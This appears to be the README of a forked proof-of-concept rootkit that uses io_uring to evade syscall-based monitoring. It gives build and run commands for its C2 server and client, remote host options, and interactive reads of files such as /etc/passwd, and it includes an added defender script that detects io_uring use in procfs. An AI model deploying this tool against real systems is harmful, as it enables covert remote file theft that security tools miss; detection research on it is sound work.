Curing is a POC rootkit that uses io_uring to perform file operations and network communication without traditional syscalls, making it invisible to security tools that only monitor syscalls.
This enhanced version adds interactive file reading capabilities and flexible deployment options:
- 🎯 Interactive Mode: Real-time file reading with command-line interface
- 🌐 Flexible Networking: Support for custom IP addresses and ports
- ⚙️ Command-line Arguments: Override config files with CLI parameters
- 📁 Any File Access: Read any accessible file on the target system
- 🔧 Easy Deployment: Simple setup for local testing or remote operations
The original Curing project was created by amitschendel and demonstrates io_uring bypass techniques against Linux security tools. The idea was born at CCC conference #38c3.
📖 Original article: io_uring rootkit bypasses Linux security
```bash
make clean && make all
```

```bash
# Default (localhost:8888)
./build/server
# Custom host and port
./build/server -host 0.0.0.0 -port 9999
```

```bash
# Local connection
./build/client -interactive
# Remote connection
./build/client -interactive -host 192.168.1.100 -port 9999
```

```
> /etc/passwd
> /etc/hostname
> /tmp/myfile.txt
> quit
```
```
curing/
├── cmd/                 # Client application
├── server/              # Server application
├── pkg/
│   ├── client/          # Client implementation
│   ├── server/          # Server implementation
│   ├── common/          # Shared types and commands
│   └── config/          # Configuration management
├── poc/                 # Original POC demonstration
└── io_uring_example/    # Simple io_uring usage example
```
- Quick Start Guide - 5-minute setup guide
- Original POC Demo - Falco bypass demonstration
- io_uring Example - Simple io_uring usage
- Changelog - What's new in this version
- Client connects to server using io_uring network operations
- User enters file paths interactively
- Server reads files using io_uring file operations
- Results are sent back through io_uring network operations
- No traditional syscalls are used for file access or network communication
The original mode works as a traditional C2 where the client pulls predefined commands from the server.
- ✅ Interactive file reading - Real-time file access
- ✅ Flexible networking - Custom IP/port support
- ✅ Command-line arguments - Override config files
- ✅ Remote deployment - Easy setup across networks
- ✅ Help system - Built-in usage guides
- ✅ Read files - Using io_uring file operations
- ✅ Write files - Using io_uring file operations
- ✅ Create symbolic links - Using io_uring operations
- ✅ C2 communication - Using io_uring network operations
- ❌ Execute processes - Blocked by io_uring limitations
Verify that no traditional syscalls are used:
```bash
# Monitor file operations
strace -f -e trace=openat,read,write -p $(pgrep server)
# Monitor network operations
strace -f -e trace=socket,connect,send,recv -p $(pgrep client)
```

You should see no file or network-related syscalls because everything goes through io_uring.
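A defender-side complement to the strace check above, as an added example that is not part of Curing or this fork: since the tool's I/O does not show up as `openat`, `read` or `connect` events, this script enumerates processes that hold io_uring file descriptors by reading procfs. The function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of Curing: list processes that hold an io_uring
# instance. The kernel exposes each ring fd in procfs as a link whose target
# is "anon_inode:[io_uring]". Function names here are made up for this example.

find_io_uring_procs() {
    proc_root="${1:-/proc}"
    for pid_dir in "$proc_root"/[0-9]*; do
        [ -d "$pid_dir/fd" ] || continue
        count=0
        for fd in "$pid_dir"/fd/*; do
            # readlink fails if the process exited or we lack permission
            target=$(readlink "$fd" 2>/dev/null) || continue
            case "$target" in
                "anon_inode:[io_uring]") count=$((count + 1)) ;;
            esac
        done
        [ "$count" -gt 0 ] || continue
        comm=$(cat "$pid_dir/comm" 2>/dev/null || echo "?")
        # Output: PID, command name, number of rings
        printf '%s %s %s\n' "${pid_dir##*/}" "$comm" "$count"
    done
}

# Constructed tree standing in for /proc (PIDs and names are sample values).
make_sample_proc() {
    root=$(mktemp -d)
    mkdir -p "$root/101/fd" "$root/202/fd"
    echo "sshd" > "$root/101/comm"
    ln -s "socket:[4242]" "$root/101/fd/3"
    echo "client" > "$root/202/comm"
    ln -s "/dev/null" "$root/202/fd/0"
    ln -s "anon_inode:[io_uring]" "$root/202/fd/3"
    ln -s "anon_inode:[io_uring]" "$root/202/fd/4"
    echo "$root"
}

# --live scans the real /proc; otherwise run on the constructed tree.
if [ "${1:-}" = "--live" ]; then
    find_io_uring_procs /proc
else
    sample=$(make_sample_proc)
    find_io_uring_procs "$sample"
    rm -rf "$sample"
fi
```

Reading other users' fd directories requires root, and the scan is a point-in-time snapshot, so it complements rather than replaces auditing of the `io_uring_setup` syscall itself.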
- Linux kernel 5.1+ (io_uring support)
- Go 1.21.6+
- Build tools (make, gcc for io_uring example)
FOR SECURITY RESEARCH AND EDUCATION ONLY
This project demonstrates io_uring bypass techniques against syscall-based security monitoring.
- ✅ Security research and education
- ✅ Testing your own systems
- ❌ Unauthorized access to systems
- ❌ Malicious activities
Users are responsible for compliance with applicable laws and regulations.
This is an enhanced fork of the original Curing project.
Enhancements in this fork:
- Interactive file reading capabilities
- Flexible networking with custom IP/port support
- Command-line argument system
- Enhanced documentation and user experience
Original project credit: amitschendel